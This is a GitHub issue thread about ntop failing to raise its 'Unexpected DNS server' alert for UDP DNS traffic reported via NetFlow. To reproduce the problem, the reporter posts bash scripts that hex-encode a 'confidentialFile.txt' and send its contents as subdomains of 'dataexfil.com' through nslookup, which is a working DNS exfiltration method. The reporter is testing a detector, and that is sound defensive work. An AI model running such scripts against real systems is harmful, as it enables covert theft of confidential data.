Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unexpected DNS server alert #591

Open
Cyberfrenk opened this issue Dec 17, 2023 · 3 comments
Open

Unexpected DNS server alert #591

Cyberfrenk opened this issue Dec 17, 2023 · 3 comments
Assignees
@NicoMaio

Comments

@Cyberfrenk
Copy link

Hello Team,
I'm trying to trigger the "Unexpercted DNS server" alert in my environment, but it's working only when DNS requests are based on TCP, when DNSnrequest are UDP based protocol is not recognised and the destination port is marked as "unknown".
Here is my environment, the "netflow-server1" is the ntop/nprobe server, the virtual cisco router in the middle is sending netflow record to it:

networkTopology

Here is the result of the DNS UDP flow:
ntopFlowUDP

Here is the result of the DNS TCP flow:
ntopFlowTCP

I'm attaching here the pcap (dnsRequestsUDP.pcapng) with the DNS requests based on UDP (no alert triggered), the pcap (dnsRequestsTCP.pcapng) with the DNS requests based on TCP (alert triggered) and the netflow capture that goes from the cisco router to the netflow server (UDP and TCP) (netflowUDP.pcapng and netflowTCP.pcapng)
Kindly help me to understand what is missing on the netflow record that "summarized" the DNS requests, the ip protocol 17 (UDP) and the destination port 53 are present.

*A sample CFLOW packet that contain the UDP DNS request based is the 7 (netflowUDP.pcapng)
**A sample CFLOW packet that contain the TCP DNS request based is the 73 (netflowTCP.pcapng)

netflowRecordUDP
netflowRecordTCP

Grazie
Davide
@Cyberfrenk
Copy link
Author

Hi Team,
Here are the steps to rimulate my scenario:

  • Create a "confidentialFile.txt" file enough longer
  • Convert its content in hex data with the below command (needed the xxd packet)
    xxd -p -c48 confidentialFile.txt > hex.txt
  • Launch the below script, the 1st send data through UDP (no alarm trigger), the 2nd through TCP (alarm trigger)
    With this test I'm trying to trigger the "unexpecter DNS server" alert only
#!/bin/bash
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n $i'p' hex.txt)
  echo $line
  echo nslookup $line.dataexfil.com 10.0.20.10
  nslookup $line.dataexfil.com 10.0.20.10
done


#!/bin/bash
for (( i=1 ; i<=236 ; i+=1 )) ; do
  line=$(sed -n $i'p' hex.txt)
  echo $line
  echo nslookup $line.dataexfil.com 10.0.20.10
  nslookup -vc $line.dataexfil.com 10.0.20.10
done

Here is the NTOP configuration:
unexpectedDnsServerConfig

Since we're asking resolution to the server 10.0.20.10 instead of 1.1.1.1 or 8.8.8.8, we'd expect to have the menthioned alert

*The above scenario has the purpose to simulte a DNS data exfiltration, I've tried to simulate it with the ntop/nrpobe server inline and it detect the "Unexpected DNS server" and also the "Suspicious DNS traffic"

Thanks in advance
Davide

@NicoMaio
Copy link

Hi @Cyberfrenk,

Could you please send me the dnsRequestsUDP.pcapng and the dnsRequestsTCP.pcapng files to maio@ntop.org?

@Cyberfrenk
Copy link
Author

Cyberfrenk commented Jan 30, 2024
edited

Hi @NicoMaio,
pcapng files sent!

Thank you

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@NicoMaio NicoMaio

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@NicoMaio @Cyberfrenk